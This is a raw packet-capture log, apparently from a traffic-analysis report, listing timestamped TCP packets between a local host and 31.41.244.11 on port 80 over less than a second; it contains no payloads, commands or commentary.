                                                                                                                                                              Dec 18, 2024 11:47:19.441478014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.441526890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.442517996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.442651987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.442703009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.443670034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.443726063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.444082975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.444878101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.444926977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.445096970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.445166111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.446022034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.446213007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.446264029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.447194099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.448225021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.448280096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.448410988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.448481083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.448530912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.449568033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.449611902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.449700117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.450778961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.450834990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.450834990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.451864004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.451913118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.452002048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.452049017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.453044891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.453135967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.453186035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.454235077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.455147028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.455202103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.455348015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.455398083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.455454111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.456552029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.456604004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.456655979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.456942081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.457674026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.457812071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.457861900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.458920956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.459033966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.459098101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.460050106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.460107088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.460143089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.461144924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.461313009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.461365938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.461508036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.461555004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.462415934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.462532043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.462611914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.463550091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.464027882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.464107037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.464756966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.465460062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.465519905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.465795994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.465843916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.595519066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.595727921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.595801115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.596081972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.596122026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.596134901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.596199036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.597261906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.597345114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.597537041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.597584009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.598474026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.598520994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.598932028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.598978996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.599709034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.599790096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.599988937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.600037098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.600770950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.600816965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.601106882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.601154089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.601895094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.601943016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.601949930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.601993084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.603071928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.603125095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.603367090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.603420973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.604262114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.604306936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.605019093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.605066061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.605448008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.605494976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.605670929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.605720043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.606584072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.606626987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.606736898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.606782913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.607837915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.607903957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.607980967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.608023882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.608913898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.609008074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.609057903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.610224009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.610271931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.610335112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.610378027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.611296892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.611340046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.611367941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.611414909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.612611055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.612658978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.612915993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.612962008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.613652945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.613699913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.613898039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.613949060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.614778996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.614828110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.615036964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.615082979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.615967989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.616020918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.616647959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.616691113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.617140055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.617183924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.617218018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.617261887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.618453026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.618503094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.618633986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.618680000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.619477987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.619524002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.620368004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.620417118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.620637894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.620683908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.620876074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.620922089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.621788025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.621838093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.622297049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.622339964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.623251915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.623265028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.623296976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.623313904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.624140024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.624190092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.624330997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.624376059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.625417948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.625467062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.625509024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.625556946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.626585960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.626633883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.626812935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.626859903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.627758980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.627773046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.627800941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.627815962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.628812075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.628859043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.628899097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.628941059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.630026102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.630074024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.630150080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.630203009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.631285906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.631340981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.631360054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.631403923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.632394075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.632450104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.632529974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.632575989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.633548975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.633599043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.633941889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.633987904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.634746075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.634759903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.634788036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.635932922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.635972023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.637036085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.637048960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.637075901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.637094021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.638329029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.638339996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.638356924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.638375044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.638391972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.639337063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.639381886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.640031099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.640072107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.640584946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.640625954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.640975952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.641016006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.641735077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.641777039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.642174959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.642222881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.643095970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.643138885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.643151045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.643188953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.644176960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.644218922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.644716024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.644754887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.645194054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.645236015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.645273924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.645311117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.646384954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.646462917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.646576881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.646620989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.647500038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.647543907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.647840023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.647876978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.648698092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.648739100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.649408102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.649456024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.649826050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.650008917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.650379896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.650470018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.651113033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.651165962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.651379108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.651422977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.652219057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.652260065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.652340889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.652379036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.653343916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.653387070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.653714895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.653758049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.654517889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.654565096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.654933929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.654975891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.655806065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.655844927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.655945063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.655997992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.656936884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.656974077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.786756039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.786772013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.786983013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.787362099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.787374973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.787446976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.788343906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.788419962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.788569927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.788608074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.789731979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.789900064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.789947987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.790699005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.790924072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.791023016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.791867018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.791912079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.792459011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.793028116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.793040037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.793071985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.794219017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.794291019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.794332027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.795353889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.795396090 CET804980631.41.244.11192.168.2.6
